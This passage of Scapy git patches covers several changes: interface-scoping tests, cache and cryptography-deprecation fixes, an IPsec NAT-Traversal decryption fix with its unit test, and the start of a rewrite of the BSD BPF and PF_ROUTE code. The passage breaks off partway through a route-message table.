--- a/test/fields.uts +++ b/test/fields.uts @@ -139,7 +139,7 @@ assert r == b"FOO\x01\x02\x03\x04" = SourceIPField ~ core field defaddr = conf.route.route('0.0.0.0')[1] -class Test(Packet): fields_desc = [SourceIPField("sourceip", None)] +class Test(Packet): fields_desc = [SourceIPField("sourceip")] assert Test().sourceip == defaddr assert Test(raw(Test())).sourceip == defaddr diff --git a/test/linux.uts b/test/linux.uts index 8afe94962b0..76a4e3da832 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -63,6 +63,53 @@ if exit_status == 0: else: assert True + += Test scoped interface addresses +~ linux needs_root + +import os +exit_status = os.system("ip link add name scapy0 type dummy") +exit_status = os.system("ip link add name scapy1 type dummy") +exit_status |= os.system("ip addr add 192.0.2.1/24 dev scapy0") +exit_status |= os.system("ip addr add 192.0.3.1/24 dev scapy1") +exit_status |= os.system("ip link set scapy0 address 00:01:02:03:04:05 multicast on up") +exit_status |= os.system("ip link set scapy1 address 06:07:08:09:10:11 multicast on up") +assert exit_status == 0 + +conf.ifaces.reload() +conf.route.resync() +conf.route6.resync() + +conf.route6 + +try: + # IPv4 + a = Ether()/IP(dst="224.0.0.1%scapy0") + assert a[Ether].src == "00:01:02:03:04:05" + assert a[IP].src == "192.0.2.1" + b = Ether()/IP(dst="224.0.0.1%scapy1") + assert b[Ether].src == "06:07:08:09:10:11" + assert b[IP].src == "192.0.3.1" + c = Ether()/IP(dst="224.0.0.1/24%scapy1") + assert c[Ether].src == "06:07:08:09:10:11" + assert c[IP].src == "192.0.3.1" + # IPv6 + a = Ether()/IPv6(dst="ff02::fb%scapy0") + assert a[Ether].src == "00:01:02:03:04:05" + assert a[IPv6].src == "fe80::201:2ff:fe03:405" + b = Ether()/IPv6(dst="ff02::fb%scapy1") + assert b[Ether].src == "06:07:08:09:10:11" + assert b[IPv6].src == "fe80::407:8ff:fe09:1011" + c = Ether()/IPv6(dst="ff02::fb/30%scapy1") + assert c[Ether].src == "06:07:08:09:10:11" + assert c[IPv6].src == "fe80::407:8ff:fe09:1011" +finally: + exit_status = os.system("ip link del scapy0") + exit_status = os.system("ip link del scapy1") + conf.ifaces.reload() + conf.route.resync() + conf.route6.resync() + = catch loopback device missing ~ linux needs_root @@ -310,7 +357,7 @@ assert test_L3PacketSocket_sendto_python3() import os from scapy.sendrecv import _interface_selection -assert _interface_selection(None, IP(dst="8.8.8.8")/UDP()) == (conf.iface, False) +assert _interface_selection(IP(dst="8.8.8.8")/UDP()) == (conf.iface, False) exit_status = os.system("ip link add name scapy0 type dummy") exit_status = os.system("ip addr add 192.0.2.1/24 dev scapy0") exit_status = os.system("ip addr add fc00::/24 dev scapy0") @@ -318,8 +365,8 @@ exit_status = os.system("ip link set scapy0 up") conf.ifaces.reload() conf.route.resync() conf.route6.resync() -assert _interface_selection(None, IP(dst="192.0.2.42")/UDP()) == ("scapy0", False) -assert _interface_selection(None, IPv6(dst="fc00::ae0d")/UDP()) == ("scapy0", True) +assert _interface_selection(IP(dst="192.0.2.42")/UDP()) == ("scapy0", False) +assert _interface_selection(IPv6(dst="fc00::ae0d")/UDP()) == ("scapy0", True) exit_status = os.system("ip link del name dev scapy0") conf.ifaces.reload() conf.route.resync() From 722f18b03ceec6c0d006e3eed43e94c18302bc8a Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 2 Sep 2024 20:41:52 +0200 Subject: [PATCH 1348/1632] Improve cache warnings (#4517) --- scapy/data.py | 23 ++++++++++++++--------- 1 file changed, 14 insertions(+), 9 deletions(-) diff --git a/scapy/data.py b/scapy/data.py index c1d3ac22ced..a577e14c090 100644 --- a/scapy/data.py +++ b/scapy/data.py @@ -8,6 +8,7 @@ """ import calendar +import hashlib import os import pickle import warnings @@ -307,17 +308,19 @@ def _cached_loader(func, name=name): # type: (DecoratorCallable, str) -> DecoratorCallable def load(filename=None): # type: (Optional[str]) -> Any - cache_id = hash(filename) + cache_id = hashlib.sha256((filename or "").encode()).hexdigest() if cachepath.exists(): try: with cachepath.open("rb") as fd: data = pickle.load(fd) if data["id"] == cache_id: return data["content"] - except Exception: - log_loading.warning( - "Couldn't load cache from %s" % str(cachepath), - exc_info=True, + except Exception as ex: + log_loading.info( + "Couldn't load cache from %s: %s" % ( + str(cachepath), + str(ex), + ) ) cachepath.unlink(missing_ok=True) # Cache does not exist or is invalid. @@ -331,10 +334,12 @@ def load(filename=None): with cachepath.open("wb") as fd: pickle.dump(data, fd) return content - except Exception: - log_loading.warning( - "Couldn't cache %s into %s" % (repr(func), str(cachepath)), - exc_info=True, + except Exception as ex: + log_loading.info( + "Couldn't write cache into %s: %s" % ( + str(cachepath), + str(ex) + ) ) return content return load # type: ignore From 3365f3ca242cf4e0467366932052a4f8cb510e6c Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 2 Sep 2024 20:42:02 +0200 Subject: [PATCH 1349/1632] Fix cryptography deprecation warnings (#4516) --- scapy/layers/dot11.py | 14 +++++++++++--- scapy/layers/kerberos.py | 22 ++++++++++++++++------ scapy/libs/rfc3961.py | 10 +++++++--- 3 files changed, 34 insertions(+), 12 deletions(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 3e0dced1d58..d27a5fcbc3f 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -63,8 +63,16 @@ if conf.crypto_valid: from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives.ciphers import Cipher, algorithms + + try: + # cryptography > 43.0 + from cryptography.hazmat.decrepit.ciphers import ( + algorithms as decrepit_algorithms, + ) + except ImportError: + decrepit_algorithms = algorithms else: - default_backend = Ciphers = algorithms = None + default_backend = Ciphers = algorithms = decrepit_algorithms = None log_loading.info("Can't import python-cryptography v1.7+. Disabled WEP decryption/encryption. (Dot11)") # noqa: E501 @@ -1876,7 +1884,7 @@ def decrypt(self, key=None): key = conf.wepkey if key and conf.crypto_valid: d = Cipher( - algorithms.ARC4(self.iv + key.encode("utf8")), + decrepit_algorithms.ARC4(self.iv + key.encode("utf8")), None, default_backend(), ).decryptor() @@ -1901,7 +1909,7 @@ def encrypt(self, p, pay, key=None): else: icv = p[4:8] e = Cipher( - algorithms.ARC4(self.iv + key.encode("utf8")), + decrepit_algorithms.ARC4(self.iv + key.encode("utf8")), None, default_backend(), ).encryptor() diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index a84903fa192..5ad5ce42e16 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -3519,7 +3519,12 @@ def GSS_WrapEx(self, Context, msgs, qop_req=0): tok.root.Data = strrot(Data, tok.root.RRC) return msgs, tok elif Context.KrbSessionKey.etype in [23, 24]: # RC4 - from scapy.libs.rfc3961 import Hmac_MD5, Cipher, algorithms, _rfc1964pad + from scapy.libs.rfc3961 import ( + Cipher, + Hmac_MD5, + _rfc1964pad, + decrepit_algorithms, + ) # Build token seq = struct.pack(">I", Context.SendSeqNum) @@ -3560,7 +3565,7 @@ def GSS_WrapEx(self, Context, msgs, qop_req=0): # 4. Populate token + encrypt if confidentiality: # 'encrypt' is requested - rc4 = Cipher(algorithms.ARC4(Kcrypt), mode=None).encryptor() + rc4 = Cipher(decrepit_algorithms.ARC4(Kcrypt), mode=None).encryptor() tok.root.CONFOUNDER = rc4.update(Confounder) Data = rc4.update(ToEncrypt) # Split encrypted data @@ -3581,7 +3586,7 @@ def GSS_WrapEx(self, Context, msgs, qop_req=0): Kseq = Hmac_MD5(Kss).digest(b"\x00\x00\x00\x00") Kseq = Hmac_MD5(Kseq).digest(tok.root.SGN_CKSUM) # 6. Encrypt 'SND_SEQ' - rc4 = Cipher(algorithms.ARC4(Kseq), mode=None).encryptor() + rc4 = Cipher(decrepit_algorithms.ARC4(Kseq), mode=None).encryptor() tok.root.SND_SEQ = rc4.update(tok.root.SND_SEQ) # 7. Include 'InitialContextToken pseudo ASN.1 header' tok = KRB_GSSAPI_Token( @@ -3684,7 +3689,12 @@ def MakeToSign(Confounder, DecText): msgs[0].data = Data return msgs elif Context.KrbSessionKey.etype in [23, 24]: # RC4 - from scapy.libs.rfc3961 import Hmac_MD5, Cipher, algorithms, _rfc1964pad + from scapy.libs.rfc3961 import ( + Cipher, + Hmac_MD5, + _rfc1964pad, + decrepit_algorithms, + ) # Drop wrapping tok = signature.innerToken @@ -3703,7 +3713,7 @@ def MakeToSign(Confounder, DecText): Kseq = Hmac_MD5(Kss).digest(b"\x00\x00\x00\x00") Kseq = Hmac_MD5(Kseq).digest(tok.root.SGN_CKSUM) # 2. Decrypt 'SND_SEQ' - rc4 = Cipher(algorithms.ARC4(Kseq), mode=None).encryptor() + rc4 = Cipher(decrepit_algorithms.ARC4(Kseq), mode=None).encryptor() seq = rc4.update(tok.root.SND_SEQ)[:4] # 3. Compute the 'Kcrypt' key Klocal = strxor(Kss, len(Kss) * b"\xf0") @@ -3716,7 +3726,7 @@ def MakeToSign(Confounder, DecText): # 4. Decrypt if confidentiality: # 'encrypt' was requested - rc4 = Cipher(algorithms.ARC4(Kcrypt), mode=None).encryptor() + rc4 = Cipher(decrepit_algorithms.ARC4(Kcrypt), mode=None).encryptor() Confounder = rc4.update(tok.root.CONFOUNDER) Data = rc4.update(ToDecrypt) # Split encrypted data diff --git a/scapy/libs/rfc3961.py b/scapy/libs/rfc3961.py index 2bcbb55c6c9..a634b01ac3a 100644 --- a/scapy/libs/rfc3961.py +++ b/scapy/libs/rfc3961.py @@ -878,14 +878,18 @@ def string_to_key(cls, string, salt, params): def basic_encrypt(cls, key, plaintext): # type: (bytes, bytes) -> bytes assert len(plaintext) % 8 == 0 - des3 = Cipher(algorithms.TripleDES(key), modes.CBC(b"\0" * 8)).encryptor() + des3 = Cipher( + decrepit_algorithms.TripleDES(key), modes.CBC(b"\0" * 8) + ).encryptor() return des3.update(bytes(plaintext)) @classmethod def basic_decrypt(cls, key, ciphertext): # type: (bytes, bytes) -> bytes assert len(ciphertext) % 8 == 0 - des3 = Cipher(algorithms.TripleDES(key), modes.CBC(b"\0" * 8)).decryptor() + des3 = Cipher( + decrepit_algorithms.TripleDES(key), modes.CBC(b"\0" * 8) + ).decryptor() return des3.update(bytes(ciphertext)) @@ -1083,7 +1087,7 @@ def decrypt(cls, key, keyusage, ciphertext): else: kie = ki ke = Hmac_MD5(kie).digest(cksum) - rc4 = Cipher(algorithms.ARC4(ke), mode=None).decryptor() + rc4 = Cipher(decrepit_algorithms.ARC4(ke), mode=None).decryptor() basic_plaintext = rc4.update(bytes(basic_ctext)) exp_cksum = Hmac_MD5(ki).digest(basic_plaintext) ok = _mac_equal(cksum, exp_cksum) From dcb0e0c3af2dab32d97e1d27db6939ab28ee865f Mon Sep 17 00:00:00 2001 From: Iman Afaneh <124771451+ImanAfaneh293@users.noreply.github.com> Date: Mon, 2 Sep 2024 22:07:50 +0300 Subject: [PATCH 1350/1632] ipsec: Fix IPsec decrypt_esp for NAT-Traversal (#4370) * ipsec: Fix IPsec decrypt_esp for NAT-Traversal When having nat_header, encrypted.underlayer will return UDP/ESP, so when decrypting IPv6 packet, the decrypt packet will be return with nat_header (UDP), which will return a corrupted packet. Example: original packet: IPv6/TCP/Raw encrypted packet: IPv6/UDP/ESP Decrypted packet: IPv6/UDP/TCP/Raw Signed-off-by: Iman Afaneh * ipsec.uts: add unit test for IPsec NAT-Traversal Signed-off-by: Iman Afaneh --------- Signed-off-by: Iman Afaneh --- scapy/layers/ipsec.py | 9 +++++++-- test/scapy/layers/ipsec.uts | 40 +++++++++++++++++++++++++++++++++++++ 2 files changed, 47 insertions(+), 2 deletions(-) diff --git a/scapy/layers/ipsec.py b/scapy/layers/ipsec.py index f8f52d9bf1c..0815cabdbbc 100644 --- a/scapy/layers/ipsec.py +++ b/scapy/layers/ipsec.py @@ -1191,8 +1191,13 @@ def _decrypt_esp(self, pkt, verify=True, esn_en=None, esn=None): # recompute checksum ip_header = ip_header.__class__(raw(ip_header)) else: - encrypted.underlayer.nh = esp.nh - encrypted.underlayer.remove_payload() + if self.nat_t_header: + # drop the UDP header and return the payload untouched + ip_header.nh = esp.nh + ip_header.remove_payload() + else: + encrypted.underlayer.nh = esp.nh + encrypted.underlayer.remove_payload() ip_header.plen = len(ip_header.payload) + len(esp.data) cls = ip_header.guess_payload_class(esp.data) diff --git a/test/scapy/layers/ipsec.uts b/test/scapy/layers/ipsec.uts index 7ccf0f2b2ef..0af1eefdc0b 100644 --- a/test/scapy/layers/ipsec.uts +++ b/test/scapy/layers/ipsec.uts @@ -3385,6 +3385,46 @@ d * after decryption the original packet payload should be unaltered assert d[TCP] == p[TCP] +############################################################################### += IPv6 / ESP - NAT-Traversal - Transport +~ -crypto + +import socket + +p = IPv6(src='11::22', dst='22::11') +p /= TCP(sport=3333, dport=55) +p /= Raw('testdata') +p = IPv6(raw(p)) +p + +sa = SecurityAssociation(ESP, spi=0x222, + crypt_algo='NULL', crypt_key=None, + auth_algo='NULL', auth_key=None, + nat_t_header=UDP(dport=5000)) + +e = sa.encrypt(p) +e + +assert isinstance(e, IPv6) +assert e.src == '11::22' and e.dst == '22::11' +assert e.chksum != p.chksum +* the encrypted packet should have an UDP layer +assert e.nh == socket.IPPROTO_UDP +assert e.haslayer(UDP) +assert e[UDP].sport == 4500 +assert e[UDP].dport == 5000 +assert e[UDP].chksum == 0 +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi + +d = sa.decrypt(e) +d + +* after decryption the original packet payload should be unaltered +assert d[TCP] == p[TCP] +assert not d.haslayer(UDP) +assert d[Raw] == p[Raw] ############################################################################### + IPv6 / ESP From 528626a02c7bfa404a85857375da5f9b3203ebaa Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 2 Sep 2024 21:36:04 +0200 Subject: [PATCH 1351/1632] Rewrite arch/bpf (#4497) * Rewrite arch/bpf * Adapt for NetBSD * Adapt for Darwin * Cleanup VEthPair test * Cleanup get_if_raw_hwaddr where not useful * Test on all BSDs * Some tests only work on Little endian machines --- scapy/arch/__init__.py | 31 +- scapy/arch/bpf/core.py | 226 ++---- scapy/arch/bpf/pfroute.py | 1241 ++++++++++++++++++++++++++++++++ scapy/arch/bpf/supersocket.py | 1 + scapy/arch/common.py | 24 +- scapy/arch/libpcap.py | 57 +- scapy/arch/linux/__init__.py | 21 +- scapy/arch/linux/rtnetlink.py | 2 + scapy/arch/solaris.py | 1 + scapy/arch/unix.py | 22 +- scapy/arch/windows/__init__.py | 12 +- scapy/config.py | 2 +- scapy/interfaces.py | 41 +- scapy/layers/dhcp.py | 8 +- scapy/layers/dhcp6.py | 5 +- scapy/layers/tuntap.py | 2 +- scapy/route6.py | 29 - scapy/tools/UTscapy.py | 5 +- scapy/utils6.py | 16 + test/bpf.uts | 8 +- test/linux.uts | 72 +- test/regression.uts | 1008 ++++++++------------------ test/scapy/layers/inet6.uts | 4 +- test/tuntap.uts | 3 +- 24 files changed, 1772 insertions(+), 1069 deletions(-) create mode 100644 scapy/arch/bpf/pfroute.py diff --git a/scapy/arch/__init__.py b/scapy/arch/__init__.py index 776bbe0e4e9..316d398f570 100644 --- a/scapy/arch/__init__.py +++ b/scapy/arch/__init__.py @@ -14,15 +14,15 @@ from scapy.config import conf, _set_conf_sockets from scapy.consts import LINUX, SOLARIS, WINDOWS, BSD from scapy.data import ( - ARPHDR_ETHER, - ARPHDR_LOOPBACK, - ARPHDR_PPP, - ARPHDR_TUN, IPV6_ADDR_GLOBAL, IPV6_ADDR_LOOPBACK, ) -from scapy.error import log_loading, Scapy_Exception -from scapy.interfaces import _GlobInterfaceType, network_name +from scapy.error import log_loading +from scapy.interfaces import ( + _GlobInterfaceType, + network_name, + resolve_iface, +) from scapy.pton_ntop import inet_pton, inet_ntop from scapy.libs.extcap import load_extcap @@ -50,7 +50,6 @@ "get_if_list", "get_if_raw_addr", "get_if_raw_addr6", - "get_if_raw_hwaddr", "get_working_if", "in6_getifaddr", "read_nameservers", @@ -89,12 +88,7 @@ def get_if_hwaddr(iff): """ Returns the MAC (hardware) address of an interface """ - from scapy.arch import get_if_raw_hwaddr - addrfamily, mac = get_if_raw_hwaddr(iff) # noqa: F405 - if addrfamily in [ARPHDR_ETHER, ARPHDR_LOOPBACK, ARPHDR_PPP, ARPHDR_TUN]: - return str2mac(mac) - else: - raise Scapy_Exception("Unsupported address family (%i) for interface [%s]" % (addrfamily, iff)) # noqa: E501 + return resolve_iface(iff).mac or "00:00:00:00:00:00" def get_if_addr6(niff): @@ -128,9 +122,7 @@ def get_if_raw_addr6(iff): # Next step is to import following architecture specific functions: # def attach_filter(s, filter, iface) -# def get_if(iff,cmd) # def get_if_raw_addr(iff) -# def get_if_raw_hwaddr(iff) # def in6_getifaddr() # def read_nameservers() # def read_routes() @@ -140,12 +132,6 @@ def get_if_raw_addr6(iff): if LINUX: from scapy.arch.linux import * # noqa F403 elif BSD: - from scapy.arch.unix import ( # noqa F403 - read_nameservers, - read_routes, - read_routes6, - in6_getifaddr, - ) from scapy.arch.bpf.core import * # noqa F403 if not conf.use_pcap: # Native @@ -168,9 +154,6 @@ def get_if_raw_addr6(iff): def get_if_raw_addr(iff: Union['NetworkInterface', str]) -> bytes: return b"\0\0\0\0" - def get_if_raw_hwaddr(iff: Union['NetworkInterface', str]) -> Tuple[int, bytes]: - return -1, b"" - def in6_getifaddr() -> List[Tuple[str, int, str]]: return [] diff --git a/scapy/arch/bpf/core.py b/scapy/arch/bpf/core.py index b7c31ff8807..db03a03c3a9 100644 --- a/scapy/arch/bpf/core.py +++ b/scapy/arch/bpf/core.py @@ -8,150 +8,43 @@ """ -from ctypes import cdll, cast, pointer -from ctypes import c_int, c_ulong, c_uint, c_char_p, Structure, POINTER -from ctypes.util import find_library import fcntl import os -import re import socket import struct -import subprocess -import scapy -from scapy.arch.bpf.consts import BIOCSETF, SIOCGIFFLAGS, BIOCSETIF -from scapy.arch.common import compile_filter, _iff_flags -from scapy.arch.unix import get_if, in6_getifaddr -from scapy.compat import plain_str +from scapy.arch.bpf.consts import BIOCSETF, BIOCSETIF +from scapy.arch.common import compile_filter from scapy.config import conf from scapy.consts import LINUX -from scapy.data import ARPHDR_LOOPBACK, ARPHDR_ETHER -from scapy.error import Scapy_Exception, warning +from scapy.error import Scapy_Exception from scapy.interfaces import ( InterfaceProvider, NetworkInterface, - network_name, _GlobInterfaceType, ) -from scapy.pton_ntop import inet_ntop + +# re-export +from scapy.arch.bpf.pfroute import ( # noqa F403 + read_routes, + read_routes6, + _get_if_list, +) +from scapy.arch.common import get_if_raw_addr, read_nameservers # noqa: F401 # Typing from typing import ( Dict, List, - Optional, Tuple, ) if LINUX: raise OSError("BPF conflicts with Linux") - -# ctypes definitions - -LIBC = cdll.LoadLibrary(find_library("c")) - -LIBC.ioctl.argtypes = [c_int, c_ulong, ] -LIBC.ioctl.restype = c_int - -# The following is implemented as of Python >= 3.3 -# under socket.*. Remember to use them when dropping Py2.7 - -# See https://docs.python.org/3/library/socket.html#socket.if_nameindex - - -class if_nameindex(Structure): - _fields_ = [("if_index", c_uint), - ("if_name", c_char_p)] - - -_ptr_ifnameindex_table = POINTER(if_nameindex * 255) - -LIBC.if_nameindex.argtypes = [] -LIBC.if_nameindex.restype = _ptr_ifnameindex_table -LIBC.if_freenameindex.argtypes = [_ptr_ifnameindex_table] -LIBC.if_freenameindex.restype = None - -# Addresses manipulation functions - - -def get_if_raw_addr(ifname): - # type: (_GlobInterfaceType) -> bytes - """ - Returns the IPv4 address configured on 'ifname', packed with inet_pton. - """ - - ifname = network_name(ifname) - - # Get ifconfig output - subproc = subprocess.Popen( - [conf.prog.ifconfig, ifname], - close_fds=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE - ) - stdout, stderr = subproc.communicate() - if subproc.returncode: - warning("Failed to execute ifconfig: (%s)", plain_str(stderr).strip()) - return b"\0\0\0\0" - - # Get IPv4 addresses - addresses = [ - line.strip() for line in plain_str(stdout).splitlines() - if "inet " in line - ] - - if not addresses: - warning("No IPv4 address found on %s !", ifname) - return b"\0\0\0\0" - - # Pack the first address - address = addresses[0].split(' ')[1] - if '/' in address: # NetBSD 8.0 - address = address.split("/")[0] - return socket.inet_pton(socket.AF_INET, address) - - -def get_if_raw_hwaddr(ifname): - # type: (_GlobInterfaceType) -> Tuple[int, bytes] - """Returns the packed MAC address configured on 'ifname'.""" - - NULL_MAC_ADDRESS = b'\x00' * 6 - - ifname = network_name(ifname) - # Handle the loopback interface separately - if ifname == conf.loopback_name: - return (ARPHDR_LOOPBACK, NULL_MAC_ADDRESS) - - # Get ifconfig output - subproc = subprocess.Popen( - [conf.prog.ifconfig, ifname], - close_fds=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE - ) - stdout, stderr = subproc.communicate() - if subproc.returncode: - raise Scapy_Exception("Failed to execute ifconfig: (%s)" % - plain_str(stderr).strip()) - - # Get MAC addresses - addresses = [ - line.strip() for line in plain_str(stdout).splitlines() if ( - "ether" in line or "lladdr" in line or "address" in line - ) - ] - if not addresses: - raise Scapy_Exception("No MAC address found on %s !" % ifname) - - # Pack and return the MAC address - mac = [int(b, 16) for b in addresses[0].split(' ')[1].split(':')] - - # Check that the address length is correct - if len(mac) != 6: - raise Scapy_Exception("No MAC address found on %s !" % ifname) - - return (ARPHDR_ETHER, struct.pack("!BBBBBB", *mac)) - - # BPF specific functions + def get_dev_bpf(): # type: () -> Tuple[int, int] """Returns an opened BPF file object""" @@ -163,10 +56,13 @@ def get_dev_bpf(): return (fd, bpf) except OSError as ex: if ex.errno == 13: # Permission denied - raise Scapy_Exception(( - "Permission denied: could not open /dev/bpf%i. " - "Make sure to be running Scapy as root ! (sudo)" - ) % bpf) + raise Scapy_Exception( + ( + "Permission denied: could not open /dev/bpf%i. " + "Make sure to be running Scapy as root ! (sudo)" + ) + % bpf + ) continue raise Scapy_Exception("No /dev/bpf handle is available !") @@ -177,45 +73,31 @@ def attach_filter(fd, bpf_filter, iface): """Attach a BPF filter to the BPF file descriptor""" bp = compile_filter(bpf_filter, iface) # Assign the BPF program to the interface - ret = LIBC.ioctl(c_int(fd), BIOCSETF, cast(pointer(bp), c_char_p)) + ret = fcntl.ioctl(fd, BIOCSETF, bp) if ret < 0: raise Scapy_Exception("Can't attach the BPF filter !") -# Interface manipulation functions - -def _get_ifindex_list(): - # type: () -> List[Tuple[str, int]] +def in6_getifaddr(): + # type: () -> List[Tuple[str, int, str]] """ - Returns a list containing (iface, index) - """ - ptr = LIBC.if_nameindex() - ifaces = [] - for i in range(255): - iface = ptr.contents[i] - if not iface.if_name: - break - ifaces.append((plain_str(iface.if_name), iface.if_index)) - LIBC.if_freenameindex(ptr) - return ifaces - - -_IFNUM = re.compile(r"([0-9]*)([ab]?)$") + Returns a list of 3-tuples of the form (addr, scope, iface) where + 'addr' is the address of scope 'scope' associated to the interface + 'iface'. + This is the list of all addresses of all interfaces available on + the system. + """ + ifaces = _get_if_list() + return [ + (ip["address"], ip["scope"], iface["name"]) + for iface in ifaces.values() + for ip in iface["ips"] + if ip["af_family"] == socket.AF_INET6 + ] -def _get_if_flags(ifname): - # type: (_GlobInterfaceType) -> Optional[int] - """Internal function to get interface flags""" - # Get interface flags - try: - result = get_if(ifname, SIOCGIFFLAGS) - except IOError: - warning("ioctl(SIOCGIFFLAGS) failed on %s !", ifname) - return None - # Convert flags - ifflags = struct.unpack("16xH14x", result)[0] - return ifflags +# Interface provider class BPFInterfaceProvider(InterfaceProvider): @@ -234,8 +116,7 @@ def _is_valid(self, dev): raise Scapy_Exception("No /dev/bpf are available !") # Check if the interface can be used try: - fcntl.ioctl(fd, BIOCSETIF, struct.pack("16s16x", - dev.network_name.encode())) + fcntl.ioctl(fd, BIOCSETIF, struct.pack("16s16x", dev.network_name.encode())) except IOError: return False else: @@ -246,30 +127,17 @@ def _is_valid(self, dev): def load(self): # type: () -> Dict[str, NetworkInterface] - from scapy.fields import FlagValue data = {} - ips = in6_getifaddr() - for ifname, index in _get_ifindex_list(): - try: - ifflags_int = _get_if_flags(ifname) - if ifflags_int is None: - continue - mac = scapy.utils.str2mac(get_if_raw_hwaddr(ifname)[1]) - ip = inet_ntop(socket.AF_INET, get_if_raw_addr(ifname)) - except Scapy_Exception: - continue - ifflags = FlagValue(ifflags_int, _iff_flags) - if_data = { - "name": ifname, - "network_name": ifname, - "description": ifname, - "flags": ifflags, - "index": index, - "ip": ip, - "ips": [x[0] for x in ips if x[2] == ifname] + [ip], - "mac": mac - } - data[ifname] = NetworkInterface(self, if_data) + for iface in _get_if_list().values(): + if_data = iface.copy() + if_data.update( + { + "network_name": iface["name"], + "description": iface["name"], + "ips": [x["address"] for x in iface["ips"]], + } + ) + data[iface["name"]] = NetworkInterface(self, if_data) return data diff --git a/scapy/arch/bpf/pfroute.py b/scapy/arch/bpf/pfroute.py new file mode 100644 index 00000000000..20532c445b3 --- /dev/null +++ b/scapy/arch/bpf/pfroute.py @@ -0,0 +1,1241 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +This file implements the PF_ROUTE API that is used to read the network +configuration of the machine. +""" + +import ctypes +import ctypes.util +import socket +import struct + +from scapy.consts import BIG_ENDIAN, BSD, NETBSD, OPENBSD, DARWIN +from scapy.config import conf +from scapy.error import log_runtime +from scapy.packet import ( + Packet, + bind_layers, +) +from scapy.utils import atol +from scapy.utils6 import in6_mask2cidr, in6_getscope + +from scapy.fields import ( + ByteEnumField, + ByteField, + ConditionalField, + Field, + FlagsField, + IP6Field, + IPField, + MACField, + MultipleTypeField, + PacketField, + PacketListField, + FieldListField, + PadField, + StrField, + StrFixedLenField, + StrLenField, + XStrLenField, +) +from scapy.pton_ntop import inet_pton + +# Typing imports +from typing import ( + Any, + Dict, + Optional, + List, + Tuple, + Type, +) + +# Missing attributes +if not hasattr(socket, "PF_ROUTE"): + socket.PF_ROUTE = 17 + +# ctypes definitions + +if BSD: # Can be imported for testing. + LIBC = ctypes.cdll.LoadLibrary(ctypes.util.find_library("c")) + LIBC.sysctl.argtypes = [ + ctypes.POINTER(ctypes.c_int), + ctypes.c_uint, + ctypes.c_void_p, + ctypes.POINTER(ctypes.c_size_t), + ctypes.c_void_p, + ctypes.c_size_t, + ] + LIBC.sysctl.restype = ctypes.c_int +else: + LIBC = None + +_bsd_iff_flags = [ + "UP", + "BROADCAST", + "DEBUG", + "LOOPBACK", + "POINTOPOINT", + "NEEDSEPOCH", # UNNUMBERED on NetBSD + "DRV_RUNNING", + "NOARP", + "PROMISC", + "ALLMULTI", + "DRV_OACTIVE", + "SIMPLEX", + "LINK0", + "LINK1", + "LINK2", + "MULTICAST", + "CANTCONFIG", + "PPROMISC", + "MONITOR", + "STATICARP", + "STICKYARP", + "DYING", + "RENAMING", + "SPARE", + "NETLINK_1", +] + +if NETBSD: + _RTM_TYPE = { + # man 4 route + 0x01: "RTM_ADD", + 0x02: "RTM_DELETE", + 0x03: "RTM_CHANGE", + 0x04: "RTM_GET", + 0x05: "RTM_LOSING", + 0x06: "RTM_REDIRECT", + 0x07: "RTM_MISS", + 0x08: "RTM_LOCK", + 0x09: "RTM_OLDADD", + 0x0A: "RTM_OLDDEL", + 0x0B: "RTM_RESOLVE", + 0x0C: "RTM_ONEWADDR", + 0x0D: "RTM_ODELADDR", + 0x0E: "RTM_OOIFINFO", + 0x0F: "RTM_OIFINFO", + 0x10: "RTM_IFANNOUNCE", + 0x11: "RTM_IEEE80211", + 0x12: "RTM_SETGATE", + 0x13: "RTM_LLINFO_UPD", + 0x14: "RTM_IFINFO", + 0x15: "RTM_OCHGADDR", + 0x16: "RTM_NEWADDR", + 0x17: "RTM_DELADDR", + 0x18: "RTM_CHGADDR", + } +elif OPENBSD: + _RTM_TYPE = { + # man 4 route + 0x01: "RTM_ADD", + 0x02: "RTM_DELETE", + 0x03: "RTM_CHANGE", + 0x04: "RTM_GET", + 0x05: "RTM_LOSING", + 0x06: "RTM_REDIRECT", + 0x07: "RTM_MISS", + 0x08: "RTM_LOCK", + 0x09: "RTM_OLDADD", + 0x0A: "RTM_OLDDEL", + 0x0B: "RTM_RESOLVE", + 0x0C: "RTM_NEWADDR", + 0x0D: "RTM_DELADDR", + 0x0E: "RTM_IFINFO", + 0x0F: "RTM_IFANNOUNCE", + 0x10: "RTM_DESYNC", + 0x11: "RTM_INVALIDATE", + } +elif DARWIN: + _RTM_TYPE = { + # man 4 route + 0x01: "RTM_ADD", + 0x02: "RTM_DELETE", + 0x03: "RTM_CHANGE", + 0x04: "RTM_GET", + 0x05: "RTM_LOSING", + 0x06: "RTM_REDIRECT", + 0x07: "RTM_MISS", + 0x08: "RTM_LOCK", + 0x09: "RTM_OLDADD", + 0x0A: "RTM_OLDDEL", + 0x0B: "RTM_RESOLVE", + 0x0C: "RTM_NEWADDR", + 0x0D: "RTM_DELADDR", + 0x0E: "RTM_IFINFO", + 0x0F: "RTM_NEWMADDR", + 0x10: "RTM_DELMADDR", + 0x12: "RTM_IFINFO2", + 0x13: "RTM_NEWMADDR2", + 0x14: "RTM_GET2", + } +else: # FreeBSD + _RTM_TYPE = { + # man 4 route + 0x01: "RTM_ADD", + 0x02: "RTM_DELETE", + 0x03: "RTM_CHANGE", + 0x04: "RTM_GET", + 0x05: "RTM_LOSING", + 0x06: "RTM_REDIRECT", + 0x07: "RTM_MISS", + 0x08: "RTM_LOCK", + 0x09: "RTM_OLDADD", + 0x0A: "RTM_OLDDEL", + 0x0B: "RTM_RESOLVE", + 0x0C: "RTM_NEWADDR", + 0x0D: 